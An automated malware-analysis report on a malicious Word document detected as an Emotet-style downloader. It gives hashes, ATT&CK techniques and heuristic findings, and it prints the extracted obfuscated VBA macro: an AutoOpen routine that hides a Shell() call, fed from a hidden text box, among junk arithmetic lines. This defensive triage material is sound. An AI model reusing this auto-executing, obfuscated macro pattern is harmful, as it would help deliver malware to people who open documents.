Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 5f82efb7e9739f98…

MALICIOUS

Office (OLE)

Size: 71.8 KB
Created: 2018-12-17 10:22:00
Authoring application: Microsoft Office Word
First seen: 2019-10-29
MD5: fc8c4d83c810db9836f0e9e0678a26c6
SHA-1: b18e0194ff973fc0353c2dd23326bad942126713
SHA-256: 5f82efb7e9739f98c4a85c12cf7df179250d82eb8a1115327dce1ad5c8ca6de8
Risk Score: 292

Malware Insights

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1059.001 PowerShell
  • T1204.002 Malicious File

The sample contains a critical OLE_VBA_SHELL heuristic firing, indicating a Shell() call within the VBA macros. This is further supported by SC_STR_CMD and SC_STR_POWERSHELL firings, suggesting the execution of system commands or PowerShell. The presence of an AutoOpen macro (OLE_LEGACY_WORDBASIC_AUTOEXEC, OLE_VBA_AUTOOPEN, OLE_VBA_PCODE_AUTOEXEC_EXEC) indicates that the malicious code executes automatically upon opening the document. The ClamAV detection also confirms its malicious nature.

Heuristics 10

  • ClamAV: Doc.Malware.Emodldr-6787352-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Malware.Emodldr-6787352-0
  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Potential Shell call in VBA critical OLE_VBA_SHELL
    Potential Shell call in VBA
    Matched line in script
          adIiZnQEzmBBSRdCYUzckvU = 168840065 - wnzbWilCQfjwNaAhlQLVh
    QPMQJ = Array(tQiISkJ, IVGXtzBS, SECmHOYQS, Interaction.Shell(XFJMPOnthEF, kTpOWX), WmYLlr)
       YjaLmjZYjCALOTjfBKIFR = QzQVkZVGittuLtwlaFj * Rnd(110903311 / Sin(SCiHwQmlrIUTzSbvRwAD)) / Wfd + Int(166487093 - Rnd(132765174 - Tan(48963279) * 114310069 - Cos(HpjQjCYAtzwiOoJjVr)) / 242902062 * Sin(164233982 / Tan(177782734) / 76629910 / Hex(177246667))) + 138329392 + CStr(280294223) - 60769318 / CLng(60505763) * 209953532 - Fix(89937157 - Hex(41990454) * 333456932 / ChrW(QnobDVHFwTGVfMDHrTEcWss / 318058326))
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • AutoOpen macro low OLE_VBA_AUTOOPEN
    AutoOpen macro
    Matched line in script
    Attribute VB_Control = "TextBox1, 0, 0, MSForms, TextBox"
    Sub autoopen()
    riwpGDVj
  • Suspicious cmd.exe invocation with execution flag high SC_STR_CMD
    Suspicious cmd.exe invocation with execution flag
  • Reference to PowerShell high SC_STR_POWERSHELL
    Reference to PowerShell
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 9207 bytes
SHA-256: f25def3b404953428858f1cad041132aa26f529942ea20c0ea9d23c4caccc5fe
Detection
ClamAV: No threats found
Obfuscation or payload: likely
125 of 159 identifiers look randomly generated (e.g. 'AqXpJEYLNrwZmnAwkWHQaDpz') — consistent with name-mangling obfuscation.
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "BNIGFWKSioiC"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Control = "TextBox1, 0, 0, MSForms, TextBox"
Sub autoopen()
riwpGDVj
End Sub

Attribute VB_Name = "vbNsDXh"
Function riwpGDVj()
On Error Resume Next
   zjDZSddkhjlkLDdJziaGOZ = PLELiPDUHSuQhiqoSIoXqiz * Rnd(226924394 / Sin(wYSoQbZYmoOOSuUi)) / Wfd + Int(76360592 - Rnd(200214894 - Tan(116193111) * 111822735 - Cos(wfIpHzZBDhNVzmrljqqVru)) / 278014337 * Sin(188069204 / Tan(177073386) / 770095 / Hex(95511825))) + 133872034 + CStr(297422891) - 206460474 / CLng(29362178) * 207378483 - Fix(115101659 - Hex(177170170) * 3391302 / ChrW(JzJizXjGAsVIdtfoavvBpjO / 46717383))
      EIXciEWlwbhjMVULjciiG = 283418236 - AQEVfzDdkCvvPLiRozWfRwHO
   oFIkkTBcwAVoBslws = aVCnnlbwYsEzsz * Rnd(84345796 / Sin(WoWzbOAjtujVwjSdZfjSPA)) / Wfd + Int(120567625 - Rnd(154137174 - Tan(55151979) * 261586533 - Cos(JYzHXbOWzZtaMVWttBGArZb)) / 167144783 * Sin(88947611 / Tan(114068611) / 307951295 / Hex(152469610))) + 142336454 + CStr(143663558) - 339595804 / CLng(284795058) * 260904730 - Fix(127380290 - Hex(284817242) * 50540149 / ChrW(mMthKUDjEUwsHYWCnDjzYuGh / 286984026))
      caBmsdOwGoMShE = 156121755 - IwziNwdoAPHKYsGMpJsdiRb
   ffRVdWhEozSTkZlsKjmwjwd = cshwqZizuMZQMvlHOUfPc * Rnd(322357135 / Sin(imsQuJVHiCislpjOOQSZYAV)) / Wfd + Int(214833230 - Rnd(95464734 - Tan(311133520) * 204071094 - Cos(PRNGfzwMwJnpYEqNdDzSf)) / 42483929 * Sin(106154866 / Tan(336815917) / 64752995 / Hex(154862149))) + 149872125 + CStr(224532659) - 107823554 / CLng(74966160) * 10402149 - Fix(338980901 - Hex(203835859) * 265549103 / ChrW(RocMoqWPFccATKHDKvMBIBO / 318541467))
      aQwnHoKkMYYArLb = 56604681 - KWhXDXIIqESmjQajENaaczo
   HszVZtdzXvEOiFHiLMj = MKfBdHJBSAQlaZN * Rnd(143138011 / Sin(AzFjuqVwtwfSzBCDcLzNwrSk)) / Wfd + Int(187395677 - Rnd(217658410 - Tan(153244160) * 205982293 - Cos(oFslkKMiaSTKCkIdiT)) / 335363150 * Sin(92158970 / Tan(221983733) / 330572731 / Hex(90635049))) + 107070589 + CStr(57501631) - 9612531 / CLng(58898848) * 214518609 - Fix(135257600 - Hex(27940885) * 90151866 / ChrW(pfEsnhOqpYBtdCtHKG / 302877453))
      YRlqsbciBjKWEzUX = 208655899 - pBEIYIwUmGHBWNKAv
   UVAMGhNwMQmlUFAnWo = YCONXzLzzoYuojJkOwZb * Rnd(176928013 / Sin(UEtNCLtjShQaWT)) / Wfd + Int(39298793 - Rnd(58520488 - Tan(189207281) * 94657389 - Cos(iQHnVzEKVlpzNDXiKTJvAFQ)) / 143726373 * Sin(282855997 / Tan(199972974) / 93069783 / Hex(68299686))) + 278450251 + CStr(201506173) - 40156725 / CLng(145128917) * 73330879 - Fix(213722329 - Hex(289994146) * 241995077 / ChrW(QXQzAYudkCXwkvoS / 125994717))
      dzmwrjuUqfTmjLmWtwtzAhW = 290970126 - bqLFiRDsmOlaUjh
   pTNKfsqojAMHkcJftmLtI = ilCWpLiUzESRJBbjL * Rnd(186446971 / Sin(OUddRjCufwwZVbZo)) / Wfd + Int(181919236 - Rnd(53225567 - Tan(60093903) * 16593438 - Cos(JOCIpSTHDMajfuvAIlmn)) / 108125285 * Sin(337558829 / Tan(146656198) / 9765511 / Hex(206523073))) + 318653387 + CStr(277901332) - 234575870 / CLng(83988407) * 340523660 - Fix(162081629 - Hex(16483737) * 169853533 / ChrW(EFbVbRjncmWpphioTXWPP / 68932897))
      BctbjuDnXJzppZmJVEdXkfp = 43065575 - FYjBjKTuMashpzs
   DwrrwTfQuoEMjAAOGjuUjI = VABwOwLVibRbzHpvJFbLI * Rnd(167393954 / Sin(mNfDZQCEFvNVqzUQT)) / Wfd + Int(234213671 - Rnd(125227042 - Tan(147113783) * 245256737 - Cos(ZDGRnkPEwdvkOlitl)) / 36349701 * Sin(206727554 / Tan(151466772) / 74481744 / Hex(212095799))) + 236886403 + CStr(248939829) - 329795229 / CLng(327370551) * 268533446 - Fix(264622611 - Hex(52112602) * 185320561 / ChrW(DiUocwIcRoBwjaGjjhazNq / 93789965))
      sTUTqvbwUosFuzG = 320811668 - dNiJhzLrOFGhibMQMvIc
Const kTpOWX = 0
   XZKXjEKAkvVQcwCdTGXkOj = GNtIrKEzzBkncIEv * Rnd(230107384 / Sin(uXQsWiIwzKGKqbqPDKmwTqjw)) / Wfd + Int(142585891 - Rnd(95387809 - Tan(288872120) * 75132903 - Cos(VPLolUJtNqOAuKtqpLI)) / 318320085 * Sin(84272122 / Tan(31880877) / 305204143 / Hex(53122346))) + 255310620 + CStr(215051103) - 28048168 / CLng(287874401) * 117474899 - Fix(152981080 - Hex(50261971) * 254463132 / ChrW(WivuWEHhVpTYwYfmHjCiPNQV / 25226609))
      EPRcqjbCYjwvTG = 6666031 - rPbjqIYFKqEDiJNaq
   FXNiGIGmlmusVBB = nSjwjPZthDEArIpMnRjdn * Rnd(26967522 / Sin(VFumHRKjSwpfofLZqwTBD)) / Wfd + Int(28081432 - Rnd(36591125 - Tan(307919495) * 192102987 - Cos(hEEVYwjiLsocSbWTlDCcAjcr)) / 273366860 * Sin(206069093 / Tan(125891557) / 15867506 / Hex(217332622))) + 112523799 + CStr(339906561) - 339773725 / CLng(59352646) * 64242460 - Fix(235681449 - Hex(34131674) * 206620088 / ChrW(YqwFTTkNfrijSBsAwAcNfsfj / 12546678))
      tpTIsRonfLfuNJGbzbXzwzH = 56015118 - icSSfLQDZZvtWzNv
   UQZAuEcOKRccNbYwVMhKMi = bpmXAisPuzWZEZHnDdQ * Rnd(273642098 / Sin(DwQuVVnUwFclswKIjbj)) / Wfd + Int(117659005 - Rnd(12583847 - Tan(224625990) * 187002564 - Cos(BTXOYdhwtwXtVdfJFvwtunL)) / 178146278 * Sin(318630502 / Tan(201838718) / 154593679 / Hex(11489986))) + 215198959 + CStr(155983094) - 154576221 / CLng(142158245) * 133396359 - Fix(168414815 - Hex(294678871) * 10741630 / ChrW(ZvTYjsubRmDwaMGjiwOIwRuG / 207467706))
      VaBYwkdLfAfVNvRzi = 288137102 - FGKRllcitCHBMtQWTZ
   ChNoRtTWVCnaGsipBHuWR = OZWtDrPTwjPbdpvQjKHckW * Rnd(244782030 / Sin(ZWYYnRHCTQSnRXqc)) / Wfd + Int(48667863 - Rnd(13089524 - Tan(37050500) * 44740714 - Cos(iOsulXjOoBsoLUjS)) / 278875285 * Sin(207116769 / Tan(206373118) / 164096270 / Hex(85304442))) + 52861487 + CStr(85966038) - 153742701 / CLng(51747305) * 331424615 - Fix(81697512 - Hex(129573039) * 209313602 / ChrW(iQiwuHjiCtXoiOZzGD / 67621264))
      RWahwWBUmnLQiTTc = 65415235 - ZYlLdlBYdwzIrIJW
XFJMPOnthEF = BNIGFWKSioiC.TextBox1.Text + wAXGLsPi + Lvzpu + XFtojZt + dvCGMP + NMBSaTN + TSCASziX
   PCEAMmQiTCBRDVIRiiwaiv = DLhlNsjEmhUiUi * Rnd(92594661 / Sin(DUTSUNUBYPcvrQ)) / Wfd + Int(94945356 - Rnd(75725581 - Tan(128084568) * 330672693 - Cos(oiAClmwPjimnmQ)) / 177279690 * Sin(310140622 / Tan(42165739) / 77556526 / Hex(192432771))) + 233869279 + CStr(275916478) - 285992846 / CLng(215132450) * 88007235 - Fix(333481807 - Hex(103351123) * 246224250 / ChrW(VTJPWdZZCRhfWwlS / 245570062))
      piQVIzqOKwwnEWBluPZ = 156000810 - IrBsoizMrGOcXZHwz
   ONtThXsojFAmqDjOjw = RcOAqYnwrBZaiFO * Rnd(322649252 / Sin(DaIXLbSDpbkbuEjifT)) / Wfd + Int(295102257 - Rnd(338999937 - Tan(84471823) * 14821778 - Cos(tYAmHiVjcGNLJolFBwwBzDW)) / 322488657 * Sin(322771529 / Tan(273534731) / 315557261 / Hex(338718825))) + 250203687 + CStr(140976816) - 325991669 / CLng(42581721) * 4999689 - Fix(207234896 - Hex(99223587) * 335321470 / ChrW(pLYUvHVhsaquOrCP / 6805655))
      pBDpRjVuHIHLdYmuMlYjBwBP = 27404532 - FFXduqzhZzHztpwAA
   ONzANInHEiQPRGGVUfH = wiwzOkMXlzXrkZqzzwhqsCzS * Rnd(96661716 / Sin(RJwwwzCBZjOzmdvPWH)) / Wfd + Int(73254060 - Rnd(161040337 - Tan(206119474) * 292790460 - Cos(IYYzQHwfjjsTDYowa)) / 270433498 * Sin(228516641 / Tan(341814743) / 46072187 / Hex(233211831))) + 325468002 + CStr(63671180) - 24056369 / CLng(311054276) * 189627565 - Fix(211978531 - Hex(287368737) * 48982692 / ChrW(qYtqYazmucEiQuKrqhIkjw / 293318071))
      YbOuViQnYtBuJiP = 158857212 - CoXCBhPtDmwiWGujlRz
   WwJWASShSZJluwLwPkqT = fkRfKSsTwAWAXZqfzR * Rnd(135319647 / Sin(WfEptrjlUwGVOJrOrqqA)) / Wfd + Int(174746752 - Rnd(90447140 - Tan(132398715) * 160640606 - Cos(lWXUSPSWozzjcmSiGwztBl)) / 91509732 * Sin(226042140 / Tan(183731044) / 263454772 / Hex(60406812))) + 180108820 + CStr(134808436) - 26906735 / CLng(54941723) * 74143926 - Fix(209685947 - Hex(16003658) * 53230237 / ChrW(MRCjowaMriPEXRUPUi / 244742423))
      IosiGrBkpoAaizVpwQFCLBrt = 163126241 - DDjtqBRIMXYXdz
   aZScKwpbEjjEnzO = RRcScJnWXJrwVKWaCjXrGKz * Rnd(48629737 / Sin(DjcDZqJqjVKGBcQlwFBH)) / Wfd + Int(296411764 - Rnd(37699321 - Tan(302816958) * 80831729 - Cos(CGZXnHUVlZZLSzS)) / 219218566 * Sin(39231573 / Tan(272329853) / 273981261 / Hex(82591273))) + 129878496 + CStr(4331255) - 32030388 / CLng(48016802) * 38443387 - Fix(67864784 - Hex(33285242) * 315578164 / ChrW(nzpQzXjkSsNplP / 16177949))
      adIiZnQEzmBBSRdCYUzckvU = 168840065 - wnzbWilCQfjwNaAhlQLVh
QPMQJ = Array(tQiISkJ, IVGXtzBS, SECmHOYQS, Interaction.Shell(XFJMPOnthEF, kTpOWX), WmYLlr)
   YjaLmjZYjCALOTjfBKIFR = QzQVkZVGittuLtwlaFj * Rnd(110903311 / Sin(SCiHwQmlrIUTzSbvRwAD)) / Wfd + Int(166487093 - Rnd(132765174 - Tan(48963279) * 114310069 - Cos(HpjQjCYAtzwiOoJjVr)) / 242902062 * Sin(164233982 / Tan(177782734) / 76629910 / Hex(177246667))) + 138329392 + CStr(280294223) - 60769318 / CLng(60505763) * 209953532 - Fix(89937157 - Hex(41990454) * 333456932 / ChrW(QnobDVHFwTGVfMDHrTEcWss / 318058326))
      NZatsmnzCRaAhjzjf = 190526624 - FFpdFBotCVYYurM
   BERAMTwnhszCwzo = AqXpJEYLNrwZmnAwkWHQaDpz * Rnd(180991939 / Sin(ErNfjuqKzlJTzzjFmVUYBu)) / Wfd + Int(285483584 - Rnd(15736758 - Tan(121846422) * 172627391 - Cos(XWwBXOWzjziKEjbpPnQWKkU)) / 113791680 * Sin(128592926 / Tan(205929039) / 19831817 / Hex(251256036))) + 64444140 + CStr(2482966) - 73768814 / CLng(86458834) * 41459293 - Fix(17576855 - Hex(119905054) * 265108796 / ChrW(klFdzzIELQoZFc / 96914293))
      DhnBfhsLkpjmUE = 11011084 - npiCLtMkMMIOOMEYw
End Function